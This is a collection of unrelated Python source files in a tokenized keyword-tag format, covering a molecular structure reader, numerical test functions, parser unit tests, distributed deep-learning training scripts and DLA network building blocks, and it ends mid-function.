"""<line_sep>ctab_lines=_get_ctab_lines(self.lines)<if_stmt>len(ctab_lines)<eq>0<block_start><raise>InvalidFileError("File does not contain structure data")<block_end><return>read_structure_from_ctab(ctab_lines)<block_end><def_stmt>set_structure self atoms<block_start>"""
Set the :class:`AtomArray` for the file.
Parameters
----------
array : AtomArray
The array to be saved into this file.
Must have an associated :class:`BondList`.
"""<line_sep>self.lines=self.lines[:N_HEADER]+write_structure_to_ctab(atoms)<block_end><block_end><def_stmt>_get_ctab_lines lines<block_start><for_stmt>i,line enumerate(lines)<block_start><if_stmt>line.startswith("M END")<block_start><return>lines[N_HEADER:i+1]<block_end><block_end><return>lines[N_HEADER:]<block_end> |
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
<import_from_stmt>typing List Tuple<import_stmt>numpy<as>np<import_from_stmt>emukit.core.loop.user_function UserFunctionWrapper<def_stmt>hennig2D <arrow>Tuple[UserFunctionWrapper List[Tuple[float float]]]<block_start>r"""2D toy integrand coined by <NAME>.
.. math::
f(x) = e^{-x'Sx -\sin(3\|x\|^2)}
:return: The wrapped test function, and the integrals bounds
(the latter default to [-3, 3]^2).
"""<line_sep>integral_bounds=2<times>[(-3.0 3.0)]<line_sep><return>UserFunctionWrapper(_hennig2D) integral_bounds<block_end><def_stmt>_hennig2D x:np.ndarray S:np.ndarray=<none><arrow>np.ndarray<block_start>"""
:param x: Locations for evaluation (num_points, 2).
:return: The function values at x, shape (num_points, 2).
"""<if_stmt>S<is><none><block_start>S=np.array([[1 0.5] [0.5 1]])<block_end>f=np.exp(-np.sin(3<times>np.sum(x<power>2 axis=1))-np.sum((x@S)<times>x axis=1))<line_sep><return>np.reshape(f [x.shape[0] 1])<block_end> |
<def_stmt>get_strob_numbers num_digits<block_start><if_stmt><not>num_digits<block_start><return>[""]<block_end><elif_stmt>num_digits<eq>1<block_start><return>["0" "1" "8"]<block_end>smaller_strob_numbers=get_strob_numbers(num_digits-2)<line_sep>strob_numbers=list()<for_stmt>x smaller_strob_numbers<block_start>strob_numbers.extend(["1"+x+"1" "6"+x+"9" "9"+x+"6" "8"+x+"8" ])<block_end><return>strob_numbers<block_end># Tests
<assert_stmt>get_strob_numbers(1)<eq>['0' '1' '8']<assert_stmt>get_strob_numbers(2)<eq>['11' '69' '96' '88']<assert_stmt>get_strob_numbers(3)<eq>['101' '609' '906' '808' '111' '619' '916' '818' '181' '689' '986' '888']<line_sep> |
"""The :func:`deephyper.nas.run.horovod.run` function is used to evaluate a deep neural network by enabling data-parallelism with Horovod to the :func:`deephyper.nas.run.alpha.run` function. This function will automatically apply the linear scaling rule to the learning rate and batch size given the current number of ranks (i.e., the initial learning rate and batch size are scaled by the number of ranks).
"""<import_stmt>os<import_stmt>traceback<import_stmt>logging<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>deephyper.contrib.callbacks import_callback<import_stmt>horovod.tensorflow.keras<as>hvd<import_stmt>deephyper.nas.trainer._arch<as>a<import_from_stmt>deephyper.nas.trainer HorovodTrainer<import_from_stmt>deephyper.nas.run._util compute_objective load_config preproc_trainer save_history setup_data get_search_space <line_sep>logger=logging.getLogger(__name__)<line_sep># Default callbacks parameters
default_callbacks_config={"EarlyStopping":dict(monitor="val_loss" min_delta=0 mode="min" verbose=0 patience=0) "ModelCheckpoint":dict(monitor="val_loss" mode="min" save_best_only=<true> verbose=1 filepath="model.h5" save_weights_only=<false> ) "TensorBoard":dict(log_dir="" histogram_freq=0 batch_size=32 write_graph=<false> write_grads=<false> write_images=<false> update_freq="epoch" ) "CSVLogger":dict(filename="training.csv" append=<true>) "CSVExtendedLogger":dict(filename="training.csv" append=<true>) "TimeStopping":dict() "ReduceLROnPlateau":dict(patience=5 verbose=0) }<line_sep># Name of Callbacks reserved for root node
hvd_root_cb=["ModelCheckpoint" "Tensorboard" "CSVLogger" "CSVExtendedLogger"]<def_stmt>run_horovod config:dict<arrow>float<block_start>hvd.init()<line_sep># Threading configuration
<if_stmt>os.environ.get("OMP_NUM_THREADS" <none>)<is><not><none><block_start>logger.debug(f"OMP_NUM_THREADS is {os.environ.get('OMP_NUM_THREADS')}")<line_sep>num_intra=int(os.environ.get("OMP_NUM_THREADS"))<line_sep>tf.config.threading.set_intra_op_parallelism_threads(num_intra)<line_sep>tf.config.threading.set_inter_op_parallelism_threads(2)<block_end><if_stmt>os.environ.get("CUDA_VISIBLE_DEVICES")<is><not><none><block_start>devices=os.environ.get("CUDA_VISIBLE_DEVICES").split(",")<line_sep>os.environ["CUDA_VISIBLE_DEVICES"]=devices[hvd.rank()]<block_end>config["seed"]<line_sep>seed=config["seed"]<if_stmt>seed<is><not><none><block_start>np.random.seed(seed)<line_sep>tf.random.set_seed(seed)<block_end>load_config(config)<line_sep># Scale batch size and learning rate according to the number of ranks
initial_lr=config[a.hyperparameters][a.learning_rate]<line_sep>batch_size=config[a.hyperparameters][a.batch_size]<times>hvd.size()<line_sep>learning_rate=config[a.hyperparameters][a.learning_rate]<times>hvd.size()<line_sep>logger.info(f"Scaled: 'batch_size' from {config[a.hyperparameters][a.batch_size]} to {batch_size} ")<line_sep>logger.info(f"Scaled: 'learning_rate' from {config[a.hyperparameters][a.learning_rate]} to {learning_rate} ")<line_sep>config[a.hyperparameters][a.batch_size]=batch_size<line_sep>config[a.hyperparameters][a.learning_rate]=learning_rate<line_sep>input_shape,output_shape=setup_data(config)<line_sep>search_space=get_search_space(config input_shape output_shape seed=seed)<line_sep># Initialize Horovod
model_created=<false><try_stmt><block_start>model=search_space.sample(config["arch_seq"])<line_sep>model_created=<true><block_end><except_stmt><block_start>logger.info("Error: Model creation failed...")<line_sep>logger.info(traceback.format_exc())<block_end><if_stmt>model_created# Setup callbacks only
<block_start>callbacks=[# Horovod: broadcast initial variable states from rank 0 to all other processes.
# This is necessary to ensure consistent initialization of all workers when
# training is started with random weights or restored from a checkpoint.
hvd.callbacks.BroadcastGlobalVariablesCallback(0) # Horovod: average metrics among workers at the end of every epoch.
#
# Note: This callback must be in the list before the ReduceLROnPlateau,
# TensorBoard or other metrics-based callbacks.
hvd.callbacks.MetricAverageCallback() # Horovod: using `lr = 1.0 * hvd.size()` from the very beginning leads to worse final
# accuracy. Scale the learning rate `lr = 1.0` ---> `lr = 1.0 * hvd.size()` during
# the first five epochs. See https://arxiv.org/abs/1706.02677 for details.
#! initial_lr argument is not available in horovod==0.19.0
hvd.callbacks.LearningRateWarmupCallback(warmup_epochs=5 verbose=0 initial_lr=initial_lr) ]<line_sep>cb_requires_valid=<false># Callbacks requires validation data
callbacks_config=config[a.hyperparameters].get(a.callbacks {})<if_stmt>callbacks_config<is><not><none><block_start><for_stmt>cb_name,cb_conf callbacks_config.items()<block_start><if_stmt>cb_name<in>default_callbacks_config# cb_bame in hvd_root_cb implies hvd.rank() == 0
<block_start><if_stmt><not>(cb_name<in>hvd_root_cb)<or>hvd.rank()<eq>0<block_start>default_callbacks_config[cb_name].update(cb_conf)<line_sep># Import and create corresponding callback
Callback=import_callback(cb_name)<line_sep>callbacks.append(Callback(**default_callbacks_config[cb_name]))<if_stmt>cb_name<in>["EarlyStopping"]<block_start>cb_requires_valid="val"<in>cb_conf["monitor"].split("_")<block_end><block_end><block_end><else_stmt><block_start>logger.error(f"'{cb_name}' is not an accepted callback!")<block_end><block_end><block_end>trainer=HorovodTrainer(config=config model=model)<line_sep>trainer.callbacks.extend(callbacks)<line_sep>last_only,with_pred=preproc_trainer(config)<line_sep>last_only=last_only<and><not>cb_requires_valid<line_sep>history=trainer.train(with_pred=with_pred last_only=last_only)<line_sep># save history
<if_stmt>hvd.rank()<eq>0<block_start>save_history(config.get("log_dir" <none>) history config)<block_end>result=compute_objective(config["objective"] history)<block_end><else_stmt># penalising actions if model cannot be created
<block_start>result=-1<block_end><if_stmt>result<l>-10<block_start>result=-10<block_end><return>result<block_end> |
<import_from_stmt>.onelinerizer onelinerize<line_sep> |
<import_stmt>sys<line_sep>sys.path.insert(0 "../..")<import_stmt>pprint<import_stmt>logging<line_sep>logging.basicConfig(level="INFO")<import_from_stmt>ttp ttp<def_stmt>test_pipe_separated_regexes <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.1 98 0950.5785.5cd1 ARPA FastEthernet2.13
Internet 10.12.13.2 98 0950.5785.5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.4 198 0950.5C8A.5c41 ARPA GigabitEthernet2.17
</input>
<vars>
INTF_RE = r"GigabitEthernet\\S+|Fast\\S+"
</vars>
<group name="arp_test">
Internet {{ ip | re("IP")}} {{ age | re(r"\\d+") }} {{ mac }} ARPA {{ interface | re("INTF_RE") }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950.5785.5cd1" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"0950.5C8A.5c41" } ]}]]<block_end># test_pipe_separated_regexes()
<def_stmt>test_multiple_inline_regexes <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.1 98 0950.5785.5cd1 ARPA FastEthernet2.13
Internet 10.12.13.2 98 0950.5785.5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.4 198 0950.5C8A.5c41 ARPA GigabitEthernet2.17
</input>
<vars>
INTF_RE = r"GigabitEthernet\\S+|Fast\\S+"
</vars>
<group name="arp_test">
Internet {{ ip }} {{ age }} {{ mac }} ARPA {{ interface | re(r"GigabitEthernet\\S+") | re(r"Fast\\S+") }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950.5785.5cd1" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"0950.5C8A.5c41" } ]}]]<block_end># test_multiple_inline_regexes()
<def_stmt>test_MAC_regex_formatter <block_start>template="""
<input load="text">
Protocol Address Age (min) Hardware Addr Type Interface
Internet 10.12.13.2 98 0950:5785:5cd2 ARPA Loopback0
Internet 10.12.13.3 131 0150.7685.14d5 ARPA GigabitEthernet2.13
Internet 10.12.13.1 98 0950-5785-5cd1 ARPA FastEthernet2.13
Internet 10.12.13.4 198 09:50:5C:8A:5c:41 ARPA GigabitEthernet2.17
Internet 10.12.13.5 198 09.50.5C.8A.5c.41 ARPA GigabitEthernet2.17
Internet 10.12.13.6 198 09-50-5C-8A-5c-41 ARPA GigabitEthernet2.17
Internet 10.12.13.6 198 09505C8A5c41 ARPA GigabitEthernet2.will_not_match
Internet 10.12.13.6 198 09505C8:A5c41 ARPA GigabitEthernet2.will_not_match
Internet 10.12.13.6 198 09505C.8.A5c41 ARPA GigabitEthernet2.will_not_match
</input>
<group name="arp_test">
Internet {{ ip }} {{ age }} {{ mac | MAC }} ARPA {{ interface }}
</group>
"""<line_sep>parser=ttp(template=template)<line_sep>parser.parse()<line_sep>res=parser.result()<line_sep># pprint.pprint(res)
<assert_stmt>res<eq>[[{"arp_test":[{"age":"98" "interface":"Loopback0" "ip":"10.12.13.2" "mac":"0950:5785:5cd2" } {"age":"131" "interface":"GigabitEthernet2.13" "ip":"10.12.13.3" "mac":"0150.7685.14d5" } {"age":"98" "interface":"FastEthernet2.13" "ip":"10.12.13.1" "mac":"0950-5785-5cd1" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.4" "mac":"09:50:5C:8A:5c:41" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.5" "mac":"09.50.5C.8A.5c.41" } {"age":"198" "interface":"GigabitEthernet2.17" "ip":"10.12.13.6" "mac":"09-50-5C-8A-5c-41" } ]}]]<block_end># test_MAC_regex_formatter()
|
# View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
"""
Please note, this code is only for python 3+. If you are using python 2+, please modify the code accordingly.
"""<import_from_future_stmt> print_function<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>dates=pd.date_range('20130101' periods=6)<line_sep>df=pd.DataFrame(np.random.randn(6 4) index=dates columns=['A' 'B' 'C' 'D'])<line_sep>df.iloc[2 2]=1111<line_sep>df.loc['2013-01-03' 'D']=2222<line_sep>df.A[df.A<g>0]=0<line_sep>df['F']=np.nan<line_sep>df['G']=pd.Series([1 2 3 4 5 6] index=pd.date_range('20130101' periods=6))<line_sep>print(df)<line_sep> |
# coding=utf-8
<import_stmt>torch<import_stmt>torch.distributed<as>dist<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_stmt>torch.multiprocessing<as>mp<import_from_stmt>biglm BIGLM<import_from_stmt>data Vocab DataLoader s2xy<import_from_stmt>adam AdamWeightDecayOptimizer<import_from_stmt>optim Optim<import_stmt>argparse os<import_stmt>random<def_stmt>parse_config <block_start>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--embed_dim' type=int)<line_sep>parser.add_argument('--ff_embed_dim' type=int)<line_sep>parser.add_argument('--num_heads' type=int)<line_sep>parser.add_argument('--layers' type=int)<line_sep>parser.add_argument('--dropout' type=float)<line_sep>parser.add_argument('--train_data' type=str)<line_sep>parser.add_argument('--dev_data' type=str)<line_sep>parser.add_argument('--vocab' type=str)<line_sep>parser.add_argument('--min_occur_cnt' type=int)<line_sep>parser.add_argument('--batch_size' type=int)<line_sep>parser.add_argument('--warmup_steps' type=int)<line_sep>parser.add_argument('--lr' type=float)<line_sep>parser.add_argument('--smoothing' type=float)<line_sep>parser.add_argument('--weight_decay' type=float)<line_sep>parser.add_argument('--max_len' type=int)<line_sep>parser.add_argument('--min_len' type=int)<line_sep>parser.add_argument('--print_every' type=int)<line_sep>parser.add_argument('--save_every' type=int)<line_sep>parser.add_argument('--epoch' type=int)<line_sep>parser.add_argument('--start_from' type=str default=<none>)<line_sep>parser.add_argument('--save_dir' type=str)<line_sep>parser.add_argument('--approx' type=str default='none')<line_sep>parser.add_argument('--fp16' action='store_true')<line_sep>parser.add_argument('--world_size' type=int)<line_sep>parser.add_argument('--gpus' type=int)<line_sep>parser.add_argument('--MASTER_ADDR' type=str)<line_sep>parser.add_argument('--MASTER_PORT' type=str)<line_sep>parser.add_argument('--start_rank' type=int)<line_sep>parser.add_argument('--backend' type=str)<line_sep><return>parser.parse_args()<block_end><def_stmt>update_lr optimizer lr<block_start><for_stmt>param_group optimizer.param_groups<block_start>param_group['lr']=lr<block_end><block_end><def_stmt>average_gradients model<block_start>""" Gradient averaging. """<line_sep>normal=<true><line_sep>size=float(dist.get_world_size())<for_stmt>param model.parameters()<block_start><if_stmt>param.grad<is><not><none><block_start>dist.all_reduce(param.grad.data op=dist.ReduceOp.SUM)<line_sep>param.grad.data<augdiv>size<block_end><else_stmt><block_start>normal=<false><line_sep><break><block_end><block_end><return>normal<block_end><def_stmt>eval_epoch lm_args model lm_vocab local_rank label batch_acm<block_start>ds=[]<with_stmt>open(lm_args.dev_data "r")<as>f<block_start><for_stmt>line f<block_start>line=line.strip()<if_stmt>line<block_start>ds.append(line)<block_end><block_end><block_end>batch_size=10<line_sep>batches=round(len(ds)/batch_size)<line_sep>idx=0<line_sep>avg_nll=0.<line_sep>avg_ppl=0.<line_sep>avg_acc=0.<line_sep>count_bsz=0.<line_sep>count_tok=0.<while_stmt>idx<l>len(ds)<block_start>cplb=ds[idx:idx+batch_size]<line_sep>ys_truth,ys_inp,msk=s2xy(cplb lm_vocab lm_args.max_len lm_args.min_len)<line_sep>ys_truth=ys_truth.cuda(local_rank)<line_sep>ys_inp=ys_inp.cuda(local_rank)<line_sep>msk=msk.cuda(local_rank)<line_sep>acc,nll,ppl,toks,bsz=model.ppl(ys_truth ys_inp msk)<line_sep>avg_acc<augadd>acc<line_sep>avg_nll<augadd>nll<line_sep>avg_ppl<augadd>ppl<line_sep>count_bsz<augadd>bsz<line_sep>count_tok<augadd>toks<line_sep>idx<augadd>batch_size<block_end>print('validating: label %s, batch_acm %d, acc %.6f, nll %.6f, ppl %.6f'%(label batch_acm avg_acc/count_tok avg_nll/count_bsz avg_ppl/count_bsz) flush=<true>)<block_end><def_stmt>run args local_rank<block_start>""" Distributed Synchronous """<line_sep>torch.manual_seed(1234)<line_sep>vocab=Vocab(args.vocab min_occur_cnt=args.min_occur_cnt specials=[])<if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<block_start>print("vocab.size = %d"%vocab.size flush=<true>)<block_end>model=BIGLM(local_rank vocab args.embed_dim args.ff_embed_dim args.num_heads args.dropout args.layers args.smoothing args.approx)<if_stmt>args.start_from<is><not><none><block_start>ckpt=torch.load(args.start_from map_location='cpu')<line_sep>model.load_state_dict(ckpt['model'])<block_end>model=model.cuda(local_rank)<if_stmt>args.world_size<g>1<block_start>torch.manual_seed(1234+dist.get_rank())<line_sep>random.seed(5678+dist.get_rank())<block_end>optimizer=Optim(model.embed_dim args.lr args.warmup_steps torch.optim.Adam(model.parameters() lr=0 betas=(0.9 0.998) eps=1e-9))<if_stmt>args.start_from<is><not><none><block_start>optimizer.load_state_dict(ckpt['optimizer'])<block_end>#train_data = DataLoader(vocab, args.train_data+"0"+str(local_rank), args.batch_size, args.max_len, args.min_len)
train_data=DataLoader(vocab args.train_data args.batch_size args.max_len args.min_len)<line_sep>batch_acm=0<line_sep>acc_acm,nll_acm,ppl_acm,ntokens_acm,nxs,npairs_acm,loss_acm=0. 0. 0. 0. 0. 0. 0.<while_stmt><true><block_start><if_stmt>train_data.epoch_id<g>args.epoch<block_start><break><block_end>model.train()<for_stmt>truth,inp,msk train_data<block_start>batch_acm<augadd>1<line_sep>truth=truth.cuda(local_rank)<line_sep>inp=inp.cuda(local_rank)<line_sep>msk=msk.cuda(local_rank)<line_sep>model.zero_grad()<line_sep>res,loss,acc,nll,ppl,ntokens,npairs=model(truth inp msk)<line_sep>loss_acm<augadd>loss.item()<line_sep>acc_acm<augadd>acc<line_sep>nll_acm<augadd>nll<line_sep>ppl_acm<augadd>ppl<line_sep>ntokens_acm<augadd>ntokens<line_sep>npairs_acm<augadd>npairs<line_sep>nxs<augadd>npairs<line_sep>loss.backward()<if_stmt>args.world_size<g>1<block_start>average_gradients(model)<block_end>torch.nn.utils.clip_grad_norm_(model.parameters() 1.0)<line_sep>optimizer.step()<if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<and>batch_acm%args.print_every<eq>-1%args.print_every<block_start>print('batch_acm %d, loss %.3f, acc %.3f, nll %.3f, ppl %.3f, x_acm %d, lr %.6f'%(batch_acm loss_acm/args.print_every acc_acm/ntokens_acm nll_acm/nxs ppl_acm/nxs npairs_acm optimizer._rate) flush=<true>)<line_sep>acc_acm,nll_acm,ppl_acm,ntokens_acm,loss_acm,nxs=0. 0. 0. 0. 0. 0.<block_end><if_stmt>(args.world_size<eq>1<or>dist.get_rank()<eq>0)<and>batch_acm%args.save_every<eq>-1%args.save_every<block_start><if_stmt><not>os.path.exists(args.save_dir)<block_start>os.mkdir(args.save_dir)<block_end>torch.save({'args':args 'model':model.state_dict() 'optimizer':optimizer.state_dict()} '%s/epoch%d_batch_%d'%(args.save_dir train_data.epoch_id batch_acm))<line_sep>model.eval()<line_sep>eval_epoch(args model vocab local_rank "epoch-"+str(train_data.epoch_id)+"-acm-"+str(batch_acm) batch_acm)<line_sep>model.train()<block_end><block_end><block_end><block_end><def_stmt>init_processes args local_rank fn backend='nccl'<block_start>""" Initialize the distributed environment. """<line_sep>os.environ['MASTER_ADDR']=args.MASTER_ADDR<line_sep>os.environ['MASTER_PORT']=args.MASTER_PORT<line_sep>dist.init_process_group(backend rank=args.start_rank+local_rank world_size=args.world_size)<line_sep>fn(args local_rank)<block_end><if_stmt>__name__<eq>"__main__"<block_start>mp.set_start_method('spawn')<line_sep>args=parse_config()<if_stmt>args.world_size<eq>1<block_start>run(args 0)<line_sep>exit(0)<block_end>processes=[]<for_stmt>rank range(args.gpus)<block_start>p=mp.Process(target=init_processes args=(args rank run args.backend))<line_sep>p.start()<line_sep>processes.append(p)<block_end><for_stmt>p processes<block_start>p.join()<block_end><block_end> |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/monitoring.statistics.ipynb (unless otherwise specified).
__all__=['get_alignment_metrics']<line_sep># Cell
<import_stmt>torch<import_from_stmt>..utils.utils get_mask_from_lengths<def_stmt>get_alignment_metrics alignments average_across_batch=<true> input_lengths=<none> output_lengths=<none><block_start>alignments=alignments.transpose(1 2)# [B, dec, enc] -> [B, enc, dec]
<if_stmt>input_lengths<eq><none><block_start>input_lengths=torch.ones(alignments.size(0) device=alignments.device)<times>(alignments.shape[1]-1)<line_sep># [B] # 147
<block_end><if_stmt>output_lengths<eq><none><block_start>output_lengths=torch.ones(alignments.size(0) device=alignments.device)<times>(alignments.shape[2]-1)<block_end># [B] # 767
batch_size=alignments.size(0)<line_sep>optimums=torch.sqrt(input_lengths.double().pow(2)+output_lengths.double().pow(2)).view(batch_size)<line_sep># [B, enc, dec] -> [B, dec], [B, dec]
values,cur_idxs=torch.max(alignments 1)<line_sep>cur_idxs=cur_idxs.float()<line_sep>prev_indx=torch.cat((cur_idxs[: 0][: <none>] cur_idxs[: :-1]) dim=1)<line_sep>dist=((prev_indx-cur_idxs).pow(2)+1).pow(0.5)# [B, dec]
dist.masked_fill_(~get_mask_from_lengths(output_lengths max_len=dist.size(1)) 0.0)<line_sep># set dist of padded to zero
dist=dist.sum(dim=(1))# get total dist for each B
diagonalness=(dist+1.4142135)/optimums# dist / optimal dist
maxes=alignments.max(axis=1)[0].mean(axis=1)<if_stmt>average_across_batch<block_start>diagonalness=diagonalness.mean()<line_sep>maxes=maxes.mean()<block_end>output={}<line_sep>output["diagonalness"]=diagonalness<line_sep>output["max"]=maxes<line_sep><return>output<block_end> |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Confusion matrix related metrics."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.ops confusion_matrix<as>cm<def_stmt>confusion_matrix labels predictions num_classes=<none> dtype=dtypes.int32 name=<none> weights=<none><block_start>"""Deprecated. Use tf.confusion_matrix instead."""<line_sep><return>cm.confusion_matrix(labels=labels predictions=predictions num_classes=num_classes dtype=dtype name=name weights=weights)<block_end> |
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
DLA primitives and full network models.
"""<import_stmt>numpy<as>np<import_stmt>nnabla<as>nn<import_stmt>nnabla.parametric_functions<as>PF<import_stmt>nnabla.functions<as>F<import_from_stmt>nnabla.initializer UniformInitializer ConstantInitializer NormalInitializer calc_normal_std_he_forward calc_normal_std_he_backward<import_from_stmt>nnabla.logger logger<import_from_stmt>nnabla.utils.save save<import_from_stmt>nnabla.utils.nnp_graph NnpNetworkPass<import_from_stmt>models.networks.initializers he_initializer bilinear_depthwise_initializer bilinear_initializer<line_sep>RNG=np.random.RandomState(214)<def_stmt>pf_depthwise_deconvolution x kernel stride=(1 1) pad=(1 1) dilation=(2 2) with_bias=<false> w_init=<none> b_init=<none> channel_last=<false><block_start>out_map=x.shape[3]<if>channel_last<else>x.shape[1]<if_stmt>channel_last<block_start>w_init=np.transpose(w_init (0 2 3 1))<block_end>x=PF.deconvolution(x out_map kernel pad=pad stride=stride dilation=dilation w_init=w_init with_bias=with_bias b_init=b_init group=out_map channel_last=channel_last)<line_sep><return>x<block_end><def_stmt>pf_affine r num_classes=1000 channel_last=<false><block_start>r=PF.convolution(r num_classes (1 1) channel_last=channel_last w_init=NormalInitializer(sigma=0.01 rng=RNG) name='fc')<line_sep><return>F.reshape(r (r.shape[0] -1) inplace=<false>)<block_end><def_stmt>pf_convolution x ochannels kernel pad=<none> stride=(1 1) dilation=<none> with_bias=<false> w_init=<none> b_init=<none> channel_last=<false><block_start><return>PF.convolution(x ochannels kernel stride=stride pad=pad dilation=dilation with_bias=with_bias w_init=w_init b_init=b_init channel_last=channel_last)<block_end><def_stmt>shortcut x ochannels stride shortcut_type test channel_last=<false><block_start>axes=3<if>channel_last<else>1<line_sep>ichannels=x.shape[axes]<line_sep>use_conv=shortcut_type.lower()<eq>'c'<if_stmt>ichannels<ne>ochannels<block_start><assert_stmt>(ichannels<times>2<eq>ochannels)<or>(ichannels<times>4<eq>ochannels)<if_stmt>shortcut_type.lower()<eq>'b'<block_start>use_conv=<true><block_end><block_end><if_stmt>use_conv# Convolution does everything.
# Matching channels, striding.
<block_start><with_stmt>nn.parameter_scope("shortcut_conv")<block_start>x=PF.convolution(x ochannels (1 1) stride=(stride stride) with_bias=<false> channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<block_end><block_end><else_stmt># shortcut block is slightly different for dla
<block_start><if_stmt>stride<ne>1# Stride
<block_start>x=F.max_pooling(x kernel=(stride stride) stride=(stride stride) channel_last=channel_last)<block_end><if_stmt>ichannels<ne>ochannels<block_start>x=PF.convolution(x ochannels (1 1) stride=(1 1) with_bias=<false> channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<block_end><block_end><return>x<block_end><def_stmt>basicblock x residual ochannels stride test channel_last=<false><block_start><def_stmt>bn h<block_start>axes=[3<if>channel_last<else>1]<line_sep><return>PF.batch_normalization(h axes=axes batch_stat=<not>test)<block_end><if_stmt>residual<is><none><block_start>residual=x<block_end><with_stmt>nn.parameter_scope("basicblock1")<block_start>h=F.relu(bn(PF.convolution(x ochannels (3 3) stride=(stride stride) pad=(1 1) with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("basicblock2")<block_start>h=bn(PF.convolution(h ochannels (3 3) pad=(1 1) with_bias=<false> channel_last=channel_last))<block_end><return>F.relu(F.add2(h residual))<block_end><def_stmt>bottleneck x ochannels shortcut_type stride test channel_last=<false><block_start><def_stmt>bn h<block_start>axes=[3<if>channel_last<else>1]<line_sep><return>PF.batch_normalization(h axes=axes batch_stat=<not>test)<block_end><assert_stmt>ochannels%4<eq>0<line_sep>hchannels=ochannels/4<with_stmt>nn.parameter_scope("bottleneck1")<block_start>h=F.relu(bn(PF.convolution(x hchannels (1 1) with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("bottleneck2")<block_start>h=F.relu(bn(PF.convolution(h hchannels (3 3) pad=(1 1) stride=stride with_bias=<false> channel_last=channel_last)))<block_end><with_stmt>nn.parameter_scope("bottleneck3")<block_start>h=bn(PF.convolution(h ochannels (1 1) with_bias=<false> channel_last=channel_last))<block_end><with_stmt>nn.parameter_scope("bottleneck_s")<block_start>s=shortcut(x ochannels stride shortcut_type test channel_last)<block_end><return>F.relu(F.add2(h s))<block_end><def_stmt>layer x block ochannels count stride shortcut_type test channel_last=<false><block_start><for_stmt>i range(count)<block_start><with_stmt>nn.parameter_scope("layer{}".format(i+1))<block_start>x=block(x ochannels stride<if>i<eq>0<else>(1 1) shortcut_type test channel_last=channel_last)<block_end><block_end><return>x<block_end><def_stmt>_make_conv_level x ochannels convs test stride=1 dilation=1 channel_last=<false><block_start>axes=[3<if>channel_last<else>1]<for_stmt>i range(convs)<block_start><with_stmt>nn.parameter_scope("conv{}".format(i+1))<block_start>s=(stride stride)<if>i<eq>0<else>(1 1)<line_sep>x=pf_convolution(x ochannels (3 3) stride=s pad=(dilation dilation) dilation=(dilation dilation) with_bias=<false> channel_last=channel_last)<line_sep>x=F.relu(PF.batch_normalization(x axes=axes batch_stat=<not>test))<block_end><block_end><return>x<block_end><def_stmt>root x children ochannels test concat_axis=1 kernel_size=1 channel_last=<false><block_start>axes=3<if>channel_last<else>1<with_stmt>nn.parameter_scope("root")<block_start>rng=np.random.RandomState(313)<line_sep>x=F.concatenate(x *children axis=axes)<line_sep>x=pf_convolution(x ochannels (kernel_size kernel_size) pad=((kernel_size-1)<floordiv>2 (kernel_size-1)<floordiv>2) stride=(1 1) with_bias=<false> w_init=he_initializer(ochannels kernel_size rng) channel_last=channel_last)<line_sep>x=PF.batch_normalization(x axes=[axes] batch_stat=<not>test)<line_sep>x=F.relu(x)<block_end><return>x<block_end><def_stmt>upsample x ochannels test 